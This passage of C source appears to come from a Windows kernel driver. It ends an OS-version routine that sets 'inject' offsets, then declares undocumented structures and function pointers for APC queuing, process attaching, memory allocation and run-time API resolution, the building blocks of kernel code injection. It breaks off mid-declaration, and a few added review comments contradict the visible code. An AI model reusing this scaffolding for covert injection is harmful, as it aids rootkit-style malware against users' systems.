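    if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 1)
    {
        return (BOOLEAN)(InitializeWindows7(pInjectRelevantOffset) == TRUE);
    }
    if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 0)
    {
        /* Vista (builds 6001 / 6002 were distinguished as SP1 / SP2 in the
         * original): recognised, but no offset table exists for it. */
        return FALSE;
    }
    if (SystemVersion.ulMajorVersion == 5 && SystemVersion.ulMinorVersion == 2)
    {
        return (BOOLEAN)(InitializeWindows2003(pInjectRelevantOffset) == TRUE);
    }
    if (SystemVersion.ulMajorVersion == 5 && SystemVersion.ulMinorVersion == 1)
    {
        return (BOOLEAN)(InitializeWindowsXp(pInjectRelevantOffset) == TRUE);
    }
    if (SystemVersion.ulMajorVersion == 5 && SystemVersion.ulMinorVersion == 0)
    {
        return (BOOLEAN)(InitializeWindows2k(pInjectRelevantOffset) == TRUE);
    }
    if (SystemVersion.ulMajorVersion == 4 && SystemVersion.ulMinorVersion == 0)
    {
        /* NT 4.0: recognised, but no offset table exists for it. */
        return FALSE;
    }

    /* Anything else is unknown and therefore unsupported. */
    return FALSE;
}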
462 |
--------------------------------------------------------------------------------
/KernelApi.h:
--------------------------------------------------------------------------------
1 | #ifndef __KERNEL_API_H__
2 | #define __KERNEL_API_H__
3 |
/*
 * Process-object access rights. The values match the public Win32
 * (winnt.h) definitions; they are repeated here because this header is used
 * from kernel-mode code.
 *
 * NOTE(review): the include guard __KERNEL_API_H__ above starts with a double
 * underscore, which is an identifier reserved for the implementation; a
 * guard such as KERNEL_API_H would avoid the clash.
 */
#define PROCESS_TERMINATE (0x0001)
#define PROCESS_CREATE_THREAD (0x0002)
#define PROCESS_SET_SESSIONID (0x0004)
#define PROCESS_VM_OPERATION (0x0008)
#define PROCESS_VM_READ (0x0010)
#define PROCESS_VM_WRITE (0x0020)
#define PROCESS_DUP_HANDLE (0x0040)
#define PROCESS_CREATE_PROCESS (0x0080)
#define PROCESS_SET_QUOTA (0x0100)
#define PROCESS_SET_INFORMATION (0x0200)
#define PROCESS_QUERY_INFORMATION (0x0400)
#define PROCESS_SUSPEND_RESUME (0x0800)
#define PROCESS_QUERY_LIMITED_INFORMATION (0x1000)
17 |
18 |
19 |
/*
 * Information classes accepted by ZwQuerySystemInformation (declared further
 * down in this header with this enum as its first parameter). These classes
 * are not part of the documented driver API, so their numbering and the
 * structures they return are tied to specific Windows releases; the ordinal
 * comments are the author's and are not checked anywhere in this file.
 * SystemModuleInformation (11) is the class paired with the
 * SYSTEM_MODULE_INFORMATION structure below (pairing inferred from names —
 * confirm at the call site).
 */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation, // 0
    SystemProcessorInformation, // 1 obsolete...delete
    SystemPerformanceInformation, // 2
    SystemTimeOfDayInformation, // 3
    SystemPathInformation, // 4
    SystemProcessInformation, // 5
    SystemCallCountInformation, // 6
    SystemDeviceInformation, // 7
    SystemProcessorPerformanceInformation, // 8
    SystemFlagsInformation, // 9
    SystemCallTimeInformation, // 10
    SystemModuleInformation, // 11
    SystemLocksInformation, // 12
    SystemStackTraceInformation, // 13
    SystemPagedPoolInformation, // 14
    SystemNonPagedPoolInformation, // 15
    SystemHandleInformation, // 16
    SystemObjectInformation, // 17
    SystemPageFileInformation, // 18
    SystemVdmInstemulInformation, // 19
    SystemVdmBopInformation, // 20
    SystemFileCacheInformation, // 21
    SystemPoolTagInformation, // 22
    SystemInterruptInformation, // 23
    SystemDpcBehaviorInformation, // 24
    SystemFullMemoryInformation, // 25
    SystemLoadGdiDriverInformation, // 26
    SystemUnloadGdiDriverInformation, // 27
    SystemTimeAdjustmentInformation, // 28
    SystemSummaryMemoryInformation, // 29
    SystemMirrorMemoryInformation, // 30
    SystemPerformanceTraceInformation, // 31
    SystemObsolete0, // 32
    SystemExceptionInformation, // 33
    SystemCrashDumpStateInformation, // 34
    SystemKernelDebuggerInformation, // 35
    SystemContextSwitchInformation, // 36
    SystemRegistryQuotaInformation, // 37
    SystemExtendServiceTableInformation, // 38
    SystemPrioritySeperation, // 39
    SystemVerifierAddDriverInformation, // 40
    SystemVerifierRemoveDriverInformation, // 41
    SystemProcessorIdleInformation, // 42
    SystemLegacyDriverInformation, // 43
    SystemCurrentTimeZoneInformation, // 44
    SystemLookasideInformation, // 45
    SystemTimeSlipNotification, // 46
    SystemSessionCreate, // 47
    SystemSessionDetach, // 48
    SystemSessionInformation, // 49
    SystemRangeStartInformation, // 50
    SystemVerifierInformation, // 51
    SystemVerifierThunkExtend, // 52
    SystemSessionProcessInformation, // 53
    SystemLoadGdiDriverInSystemSpace, // 54
    SystemNumaProcessorMap, // 55
    SystemPrefetcherInformation, // 56
    SystemExtendedProcessInformation, // 57
    SystemRecommendedSharedDataAlignment, // 58
    SystemComPlusPackage, // 59
    SystemNumaAvailableMemory, // 60
    SystemProcessorPowerInformation, // 61
    SystemEmulationBasicInformation, // 62
    SystemEmulationProcessorInformation, // 63
    SystemExtendedHandleInformation, // 64
    SystemLostDelayedWriteInformation, // 65
    SystemBigPoolInformation, // 66
    SystemSessionPoolTagInformation, // 67
    SystemSessionMappedViewInformation, // 68
    SystemHotpatchInformation, // 69
    SystemObjectSecurityMode, // 70
    SystemWatchdogTimerHandler, // 71
    SystemWatchdogTimerInformation, // 72
    SystemLogicalProcessorInformation, // 73
    SystemWow64SharedInformation, // 74
    SystemRegisterFirmwareTableInformationHandler, // 75
    SystemFirmwareTableInformation, // 76
    SystemModuleInformationEx, // 77
    SystemVerifierTriageInformation, // 78
    SystemSuperfetchInformation, // 79
    SystemMemoryListInformation, // 80
    SystemFileCacheInformationEx, // 81
    MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum
} SYSTEM_INFORMATION_CLASS;
105 |
/*
 * One loaded-module record as returned inside SYSTEM_MODULE_INFORMATION.
 * The layout is the caller's assumption about what the kernel writes; nothing
 * in this header validates it.
 *
 * NOTE(review): ImageName is a fixed 256-byte buffer and PathLength is an
 * index into it (inferred from the names). Code reading ImageName should not
 * assume the buffer is NUL-terminated or that PathLength < 256 without
 * checking.
 */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    HANDLE Section;
    PVOID MappedBase;
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
118 |
/*
 * Header of a variable-length module list: Count records follow, the first
 * of which overlays Module[0]. "Module[1]" is the pre-C99 spelling of a
 * trailing flexible array, so sizeof(SYSTEM_MODULE_INFORMATION) covers only
 * one entry.
 *
 * NOTE(review): any loop over Module[] must be bounded by Count AND by the
 * byte length actually returned for the buffer; Count alone is data written
 * by the kernel into a caller-sized buffer and can exceed what fits.
 */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
123 |
/*
 * Per-process record of the SystemProcessInformation class (pairing inferred
 * from the names). NextEntryOffset is presumably the byte distance to the
 * next record, with 0 marking the last one — confirm at the consumer, and
 * bound every hop by the returned buffer length, not just by the offset.
 *
 * NOTE(review): the SpareLi1..3 fields and the SIZE_T members make this
 * layout build- and bitness-specific; a mismatch shifts every field after
 * the first wrong one and is not detected anywhere in this header.
 */
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER SpareLi1;
    LARGE_INTEGER SpareLi2;
    LARGE_INTEGER SpareLi3;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER ReadOperationCount;
    LARGE_INTEGER WriteOperationCount;
    LARGE_INTEGER OtherOperationCount;
    LARGE_INTEGER ReadTransferCount;
    LARGE_INTEGER WriteTransferCount;
    LARGE_INTEGER OtherTransferCount;
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
159 |
/*
 * Per-thread record; presumably NumberOfThreads of these follow each
 * SYSTEM_PROCESS_INFORMATION record (inferred from the field names and the
 * usual shape of that query — confirm at the consumer). Same layout caveat
 * as the process record: nothing validates it against the running kernel.
 */
typedef struct _SYSTEM_THREAD_INFORMATION {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    LONG BasePriority;
    ULONG ContextSwitches;
    ULONG ThreadState;
    ULONG WaitReason;
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
173 |
/*
 * Output structure for the thread-information query issued through the
 * ZWQUERYINFORMATIONTHREAD pointer type below (class not fixed in this
 * header). TebBaseAddress is a user-mode pointer when it is non-NULL; it must
 * not be dereferenced from kernel mode without the usual probing.
 */
typedef struct _THREAD_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    PNT_TIB TebBaseAddress;
    CLIENT_ID ClientId;
    KAFFINITY AffinityMask;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;
182 |
/*
 * APC environment selector for KeInitializeApc (see the commented-out
 * prototype just below). The KEINITIALIZEAPC pointer type later in this
 * header takes this argument as PVOID, so the compiler will not check that
 * one of these enumerators is actually passed.
 */
typedef enum _KAPC_ENVIRONMENT {
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment,
    InsertApcEnvironment
} KAPC_ENVIRONMENT;
189 |
190 | //VOID KeInitializeApc(__out PRKAPC Apc,
191 | // __in PRKTHREAD Thread,
192 | // __in KAPC_ENVIRONMENT Environment,
193 | // __in PKKERNEL_ROUTINE KernelRoutine,
194 | // __in_opt PKRUNDOWN_ROUTINE RundownRoutine,
195 | // __in_opt PKNORMAL_ROUTINE NormalRoutine,
196 | // __in_opt KPROCESSOR_MODE ProcessorMode,
197 | // __in_opt PVOID NormalContext);
198 | //BOOLEAN KeInsertQueueApc(__inout PRKAPC Apc,
199 | // __in_opt PVOID SystemArgument1,
200 | // __in_opt PVOID SystemArgument2,
201 | // __in KPRIORITY Increment);
202 |
/*
 * Page-protection (PAGE_*), allocation-type (MEM_*) and section (SEC_*) flags
 * for the ZwAllocateVirtualMemory-style calls typed below. The values match
 * the public Win32 (winnt.h) definitions.
 *
 * NOTE(review): PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY create
 * writable+executable mappings; any use of them is the first thing a
 * reviewer of the call sites should look for, since W^X violations are
 * both a stability and a detection concern.
 */
#define PAGE_NOACCESS 0x01
#define PAGE_READONLY 0x02
#define PAGE_READWRITE 0x04
#define PAGE_WRITECOPY 0x08
#define PAGE_EXECUTE 0x10
#define PAGE_EXECUTE_READ 0x20
#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80
#define PAGE_GUARD 0x100
#define PAGE_NOCACHE 0x200
#define PAGE_WRITECOMBINE 0x400
#define MEM_COMMIT 0x1000
#define MEM_RESERVE 0x2000
#define MEM_DECOMMIT 0x4000
#define MEM_RELEASE 0x8000
#define MEM_FREE 0x10000
#define MEM_PRIVATE 0x20000
#define MEM_MAPPED 0x40000
#define MEM_RESET 0x80000
#define MEM_TOP_DOWN 0x100000
#define MEM_WRITE_WATCH 0x200000
#define MEM_PHYSICAL 0x400000
#define MEM_ROTATE 0x800000
#define MEM_LARGE_PAGES 0x20000000
#define MEM_4MB_PAGES 0x80000000
#define SEC_FILE 0x800000
#define SEC_IMAGE 0x1000000
#define SEC_PROTECTED_IMAGE 0x2000000
#define SEC_RESERVE 0x4000000
#define SEC_COMMIT 0x8000000
#define SEC_NOCACHE 0x10000000
#define SEC_WRITECOMBINE 0x40000000
#define SEC_LARGE_PAGES 0x80000000
#define MEM_IMAGE SEC_IMAGE
#define WRITE_WATCH_FLAG_RESET 0x01
238 |
239 | #ifndef _WIN64
/*
 * 32-bit (x86) build: a prototype for ZwQuerySystemInformation plus one
 * function-pointer type per kernel routine the driver resolves at run time.
 * Every pointer type is declared __stdcall, which is the x86 kernel ABI; the
 * #else branch repeats the list with __fastcall for x64.
 *
 * NOTE(review): the ZwQuerySystemInformation prototype carries no NTAPI /
 * __stdcall modifier. Unless the build sets __stdcall as the default
 * convention, this declaration disagrees with the kernel export and a call
 * through it would corrupt the stack on x86 — confirm the compiler flags or
 * add NTAPI.
 * NOTE(review): the x64 branch (cut off at the end of this view) has no
 * KEQUERYSYSTEMTIME between KEBUGCHECKEX and EXSYSTEMTIMETOLOCALTIME as far
 * as it is visible; x64 code naming that type would not compile — confirm.
 */
NTSTATUS ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, \
    PVOID SystemInformation, \
    ULONG SystemInformationLength, \
    PULONG ReturnLength);
typedef PWCHAR (__stdcall *WCSSTR)(const WCHAR *Str,const WCHAR *SubStr);
typedef VOID (__stdcall *MMUNMAPLOCKEDPAGES)(PVOID BaseAddress,PMDL MemoryDescriptorList);
typedef PVOID (__stdcall *MMMAPLOCKEDPAGES)(PMDL MemoryDescriptorList,KPROCESSOR_MODE AccessMode);
typedef VOID (__stdcall *MMBUILDMDLFORNONPAGEDPOOL)(PMDLX MemoryDescriptorList);
typedef PMDL (__stdcall *MMCREATEMDL)(PMDL MemoryDescriptorList,PVOID Base,SIZE_T Length);
typedef PVOID (__stdcall *PSGETCURRENTPROCESS)(void);
typedef PVOID (__stdcall *KEGETCURRENTTHREAD)(void);
typedef BOOLEAN (__stdcall *KEINSERTQUEUEAPC)(PKAPC Apc,PVOID SystemArg1,PVOID SystemArg2,KPRIORITY Increment);
//typedef VOID (__stdcall *PKKERNEL_ROUTINE)(PKAPC Apc,PVOID *NormalRoutine,PVOID *NormalContext,PVOID *SystemArgument1,PVOID *SystemArgument2);
/* Environment, KernelRoutine, RundownRoutine and NormalRoutine are PVOID
 * here, whereas the commented-out KeInitializeApc prototype above gives them
 * KAPC_ENVIRONMENT and PK*_ROUTINE types; the compiler cannot check these
 * arguments, so a wrong routine signature is only found at run time. */
typedef VOID (__stdcall *KEINITIALIZEAPC)(PKAPC Apc,PETHREAD Thread,PVOID Environment,PVOID KernelRoutine, \
    PVOID RundownRoutine,PVOID NormalRoutine,KPROCESSOR_MODE ProcessorMode,PVOID NormalContext);
typedef VOID (__stdcall *KEUNSTACKDETACHPROCESS)(PVOID ApcState);
typedef NTSTATUS (__stdcall *ZWALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle,PVOID *BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);
typedef VOID (__stdcall *KESTACKATTACHPROCESS)(PVOID Process,PVOID ApcState);
typedef PVOID (__stdcall *IOGETCURRENTPROCESS)(void);
typedef NTSTATUS (__stdcall *KEWAITFORSINGLEOBJECT)(PVOID Object,KWAIT_REASON WaitReason,KPROCESSOR_MODE WaitMode,BOOLEAN Alertable,PLARGE_INTEGER Timeout);
typedef VOID (__stdcall *OBDEREFERENCEOBJECT)(PVOID Object);
typedef NTSTATUS (__stdcall *ZWCLOSE)(HANDLE Handle);
typedef NTSTATUS (__stdcall *OBREFERENCEOBJECTBYHANDLE)(HANDLE Handle,ACCESS_MASK DesiredAccess,POBJECT_TYPE ObjectType,KPROCESSOR_MODE AccessMode, \
    PVOID *Object,POBJECT_HANDLE_INFORMATION HandleInformation);
typedef NTSTATUS (__stdcall *PSCREATESYSTEMTHREAD)(PHANDLE ThreadHandle,ULONG DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes, \
    HANDLE ProcessHandle,PCLIENT_ID ClientId,PKSTART_ROUTINE StartRoutine,PVOID StartContext);
typedef NTSTATUS (__stdcall *PSLOOKUPPROCESSBYPROCESSID)(HANDLE ProcessId,PVOID *Process);
typedef NTSTATUS (__stdcall *PSTERMINATESYSTEMTHREAD)(NTSTATUS ExitStatus);
typedef NTSTATUS (__stdcall *PSSETLOADIMAGENOTIFYROUTINE)(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
typedef PVOID (__stdcall *EXALLOCATEPOOLWITHTAG)(POOL_TYPE PoolType,SIZE_T NumberOfBytes,ULONG Tag);
typedef NTSTATUS (__stdcall *ZWQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
typedef VOID (__stdcall *EXFREEPOOLWITHTAG)(PVOID P,ULONG Tag);
/* Callback signature that receives a kernel image base and an allocator
 * pointer (per the parameter names); which code implements it is not visible
 * in this header. */
typedef BOOLEAN (__stdcall *Function_Entry)(PVOID pNtoskrnlBase,EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag);
typedef PUCHAR (__stdcall *PSGETPROCESSIMAGEFILENAME)(PVOID Process);
typedef NTSTATUS (__stdcall *PSREMOVELOADIMAGENOTIFYROUTINE)(PVOID NotifyRoutine);
typedef NTSTATUS (__stdcall *PSSETCREATEPROCESSNOTIFYROUTINE)(PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,BOOLEAN Remove);
/* PsGetVersion's BOOLEAN result reports a checked build, not failure; callers
 * must not treat it as an error indicator. */
typedef BOOLEAN (__stdcall *PSGETVERSION)(PULONG MajorVersion,PULONG MinorVersion,PULONG BuildNumber,PUNICODE_STRING CSDVersion);
typedef BOOLEAN (__stdcall *MMISADDRESSVALID)(PVOID VirtualAddress);
typedef NTSTATUS (__stdcall *OBOPENOBJECTBYPOINTER)(PVOID Object, \
    ULONG HandleAttributes, \
    PACCESS_STATE PassedAccessState, \
    ACCESS_MASK DesiredAccess, \
    POBJECT_TYPE ObjectType, \
    KPROCESSOR_MODE AccessMode, \
    PHANDLE Handle);
typedef NTSTATUS (__stdcall *ZWQUERYINFORMATIONTHREAD)(HANDLE ThreadHandle, \
    THREADINFOCLASS ThreadInformationClass, \
    PVOID ThreadInformation, \
    ULONG ThreadInformationLength, \
    PULONG ReturnLength);

typedef NTSTATUS (__stdcall *ZWQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle, \
    PROCESSINFOCLASS ProcessInformationClass, \
    PVOID ProcessInformation, \
    ULONG ProcessInformationLength, \
    PULONG ReturnLength);
typedef NTSTATUS (__stdcall *PSLOOKUPTHREADBYTHREADID)(HANDLE ThreadId,PETHREAD *Thread);
typedef PEPROCESS (__stdcall *IOTHREADTOPROCESS)(PETHREAD Thread);
typedef PMDL (__stdcall *IOALLOCATEMDL)(PVOID VirtualAddress,ULONG Length,BOOLEAN SecondaryBuffer,BOOLEAN ChargeQuota,PIRP Irp);
typedef VOID (__stdcall *MMPROBEANDLOCKPAGES)(PMDLX MemoryDescriptorList,KPROCESSOR_MODE AccessMode,LOCK_OPERATION Operation);
typedef PVOID (__stdcall *MMMAPLOCKEDPAGESSPECIFYCACHE)(PMDLX MemoryDescriptorList, \
    KPROCESSOR_MODE AccessMode, \
    MEMORY_CACHING_TYPE CacheType, \
    PVOID BaseAddress, \
    ULONG BugCheckOnFailure, \
    MM_PAGE_PRIORITY Priority);
typedef VOID (__stdcall *MMUNLOCKPAGES)(PMDLX MemoryDescriptorList);
typedef VOID (__stdcall *IOFREEMDL)(PMDL Mdl);
typedef NTSTATUS (__stdcall *KEDELAYEXECUTIONTHREAD)(KPROCESSOR_MODE WaitMode, \
    BOOLEAN Alertable, \
    PLARGE_INTEGER Interval);
typedef VOID (__stdcall *KEBUGCHECKEX)(ULONG BugCheckCode, \
    ULONG_PTR BugCheckParameter1, \
    ULONG_PTR BugCheckParameter2, \
    ULONG_PTR BugCheckParameter3, \
    ULONG_PTR BugCheckParameter4);
typedef VOID (__stdcall *KEQUERYSYSTEMTIME)(PLARGE_INTEGER CurrentTime);
typedef VOID (__stdcall *EXSYSTEMTIMETOLOCALTIME)(PLARGE_INTEGER SystemTime, \
    PLARGE_INTEGER LocalTime);
typedef PVOID (__stdcall *MMGETSYSTEMROUTINEADDRESS)(PUNICODE_STRING SystemRoutineName);
typedef VOID (__stdcall *RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString,PCWSTR SourceString);
/* RtlDecompressBuffer writes up to UncompressedBufferSize bytes; the caller
 * must size that buffer from trusted information and check
 * FinalUncompressedSize afterwards rather than assume the buffer was filled. */
typedef NTSTATUS (__stdcall *RTLDECOMPRESSBUFFER)(USHORT CompressionFormat, \
    PUCHAR UncompressedBuffer, \
    ULONG UncompressedBufferSize, \
    PUCHAR CompressedBuffer, \
    ULONG CompressedBufferSize, \
    PULONG FinalUncompressedSize);
327 | #else
328 | NTSTATUS ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, \
329 | PVOID SystemInformation, \
330 | ULONG SystemInformationLength, \
331 | PULONG ReturnLength);
332 | typedef PWCHAR (__fastcall *WCSSTR)(const WCHAR *Str,const WCHAR *SubStr);
333 | typedef VOID (__fastcall *MMUNMAPLOCKEDPAGES)(PVOID BaseAddress,PMDL MemoryDescriptorList);
334 | typedef PVOID (__fastcall *MMMAPLOCKEDPAGES)(PMDL MemoryDescriptorList,KPROCESSOR_MODE AccessMode);
335 | typedef VOID (__fastcall *MMBUILDMDLFORNONPAGEDPOOL)(PMDLX MemoryDescriptorList);
336 | typedef PMDL (__fastcall *MMCREATEMDL)(PMDL MemoryDescriptorList,PVOID Base,SIZE_T Length);
337 | typedef PVOID (__fastcall *PSGETCURRENTPROCESS)(void);
338 | typedef PVOID (__fastcall *KEGETCURRENTTHREAD)(void);
339 | typedef BOOLEAN (__fastcall *KEINSERTQUEUEAPC)(PKAPC Apc,PVOID SystemArg1,PVOID SystemArg2,KPRIORITY Increment);
340 | //typedef VOID (__fastcall *PKKERNEL_ROUTINE)(PVOID Apc,PVOID *NormalRoutine,PVOID *NormalContext,PVOID *SystemArgument1,PVOID *SystemArgument2);
341 | typedef VOID (__fastcall *KEINITIALIZEAPC)(PKAPC Apc,PETHREAD Thread,PVOID Environment,PVOID KernelRoutine, \
342 | PVOID RundownRoutine,PVOID NormalRoutine,KPROCESSOR_MODE ProcessorMode,PVOID NormalContext);
343 | typedef VOID (__fastcall *KEUNSTACKDETACHPROCESS)(PVOID ApcState);
344 | typedef NTSTATUS (__fastcall *ZWALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle,PVOID *BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);
345 | typedef VOID (__fastcall *KESTACKATTACHPROCESS)(PVOID Process,PVOID ApcState);
346 | typedef PVOID (__fastcall *IOGETCURRENTPROCESS)(void);
347 | typedef NTSTATUS (__fastcall *KEWAITFORSINGLEOBJECT)(PVOID Object,KWAIT_REASON WaitReason,KPROCESSOR_MODE WaitMode,BOOLEAN Alertable,PLARGE_INTEGER Timeout);
348 | typedef VOID (__fastcall *OBDEREFERENCEOBJECT)(PVOID Object);
/*
 * Function-pointer types for the kernel routines this driver reaches
 * indirectly. Each name mirrors an ntoskrnl export (e.g. ZWCLOSE -> ZwClose),
 * with the same parameter list; the only exception is Function_Entry, which
 * is project-specific. Presumably the pointers are filled in at run time
 * (see MMGETSYSTEMROUTINEADDRESS below) rather than through the import
 * table -- worth remembering when auditing which kernel APIs the driver
 * actually calls, since static import analysis will not list them.
 *
 * NOTE(review): every type is declared __fastcall. On x64 MSVC that is the
 * single native convention, so it is harmless; on x86 the kernel exports use
 * __stdcall (NTAPI) and calling through an __fastcall pointer would corrupt
 * the stack. The enclosing #if is outside this view -- confirm it restricts
 * these declarations to x64 builds.
 */
349 | typedef NTSTATUS (__fastcall *ZWCLOSE)(HANDLE Handle);
350 | typedef NTSTATUS (__fastcall *OBREFERENCEOBJECTBYHANDLE)(HANDLE Handle,ACCESS_MASK DesiredAccess,POBJECT_TYPE ObjectType,KPROCESSOR_MODE AccessMode, \
351 | PVOID *Object,POBJECT_HANDLE_INFORMATION HandleInformation);
352 | typedef NTSTATUS (__fastcall *PSCREATESYSTEMTHREAD)(PHANDLE ThreadHandle,ULONG DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes, \
353 | HANDLE ProcessHandle,PCLIENT_ID ClientId,PKSTART_ROUTINE StartRoutine,PVOID StartContext);
354 | typedef NTSTATUS (__fastcall *PSLOOKUPPROCESSBYPROCESSID)(HANDLE ProcessId,PVOID *Process);
355 | typedef NTSTATUS (__fastcall *PSTERMINATESYSTEMTHREAD)(NTSTATUS ExitStatus);
356 | typedef NTSTATUS (__fastcall *PSSETLOADIMAGENOTIFYROUTINE)(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
357 | typedef PVOID (__fastcall *EXALLOCATEPOOLWITHTAG)(POOL_TYPE PoolType,SIZE_T NumberOfBytes,ULONG Tag);
358 | typedef NTSTATUS (__fastcall *ZWQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
359 | typedef VOID (__fastcall *EXFREEPOOLWITHTAG)(PVOID P,ULONG Tag);
/* Project-specific entry signature: receives the ntoskrnl image base and an
 * allocator pointer of the EXALLOCATEPOOLWITHTAG type declared above. The
 * return value's meaning is not visible here -- see the caller. */
360 | typedef BOOLEAN (__fastcall *Function_Entry)(PVOID pNtoskrnlBase,EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag);
/* PsGetProcessImageFileName is an undocumented export; the returned buffer is
 * owned by the process object and is not guaranteed NUL-terminated --
 * presumably callers bound their reads, verify at the call site. */
361 | typedef PUCHAR (__fastcall *PSGETPROCESSIMAGEFILENAME)(PVOID Process);
362 | typedef NTSTATUS (__fastcall *PSREMOVELOADIMAGENOTIFYROUTINE)(PVOID NotifyRoutine);
363 | typedef NTSTATUS (__fastcall *PSSETCREATEPROCESSNOTIFYROUTINE)(PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,BOOLEAN Remove);
364 | typedef BOOLEAN (__fastcall *PSGETVERSION)(PULONG MajorVersion,PULONG MinorVersion,PULONG BuildNumber,PUNICODE_STRING CSDVersion);
/* NOTE(review): per the WDK, MmIsAddressValid is not a reliable guard for
 * pageable memory; a TRUE result should not be treated as proof that a
 * later access is safe. */
365 | typedef BOOLEAN (__fastcall *MMISADDRESSVALID)(PVOID VirtualAddress);
366 | typedef NTSTATUS (__fastcall *OBOPENOBJECTBYPOINTER)(PVOID Object, \
367 | ULONG HandleAttributes, \
368 | PACCESS_STATE PassedAccessState, \
369 | ACCESS_MASK DesiredAccess, \
370 | POBJECT_TYPE ObjectType, \
371 | KPROCESSOR_MODE AccessMode, \
372 | PHANDLE Handle);
373 | typedef NTSTATUS (__fastcall *ZWQUERYINFORMATIONTHREAD)(HANDLE ThreadHandle, \
374 | THREADINFOCLASS ThreadInformationClass, \
375 | PVOID ThreadInformation, \
376 | ULONG ThreadInformationLength, \
377 | PULONG ReturnLength);
378 |
379 | typedef NTSTATUS (__fastcall *ZWQUERYINFORMATIONPROCESS)(HANDLE ProcessHandle, \
380 | PROCESSINFOCLASS ProcessInformationClass, \
381 | PVOID ProcessInformation, \
382 | ULONG ProcessInformationLength, \
383 | PULONG ReturnLength);
384 | typedef NTSTATUS (__fastcall *PSLOOKUPTHREADBYTHREADID)(HANDLE ThreadId,PETHREAD *Thread);
385 | typedef PEPROCESS (__fastcall *IOTHREADTOPROCESS)(PETHREAD Thread);
/* MDL routines: an MDL allocated via IOALLOCATEMDL and locked with
 * MMPROBEANDLOCKPAGES must be unlocked (MMUNLOCKPAGES) before IOFREEMDL on
 * every path, including the failure path -- the pairing is the caller's
 * responsibility and is not visible from these declarations. */
386 | typedef PMDL (__fastcall *IOALLOCATEMDL)(PVOID VirtualAddress,ULONG Length,BOOLEAN SecondaryBuffer,BOOLEAN ChargeQuota,PIRP Irp);
387 | typedef VOID (__fastcall *MMPROBEANDLOCKPAGES)(PMDLX MemoryDescriptorList,KPROCESSOR_MODE AccessMode,LOCK_OPERATION Operation);
388 | typedef PVOID (__fastcall *MMMAPLOCKEDPAGESSPECIFYCACHE)(PMDLX MemoryDescriptorList, \
389 | KPROCESSOR_MODE AccessMode, \
390 | MEMORY_CACHING_TYPE CacheType, \
391 | PVOID BaseAddress, \
392 | ULONG BugCheckOnFailure, \
393 | MM_PAGE_PRIORITY Priority);
394 | typedef VOID (__fastcall *MMUNLOCKPAGES)(PMDLX MemoryDescriptorList);
395 | typedef VOID (__fastcall *IOFREEMDL)(PMDL Mdl);
396 | typedef NTSTATUS (__fastcall *KEDELAYEXECUTIONTHREAD)(KPROCESSOR_MODE WaitMode,BOOLEAN Alertable,PLARGE_INTEGER Interval);
397 | typedef VOID (__fastcall *KEBUGCHECKEX)(ULONG BugCheckCode, \
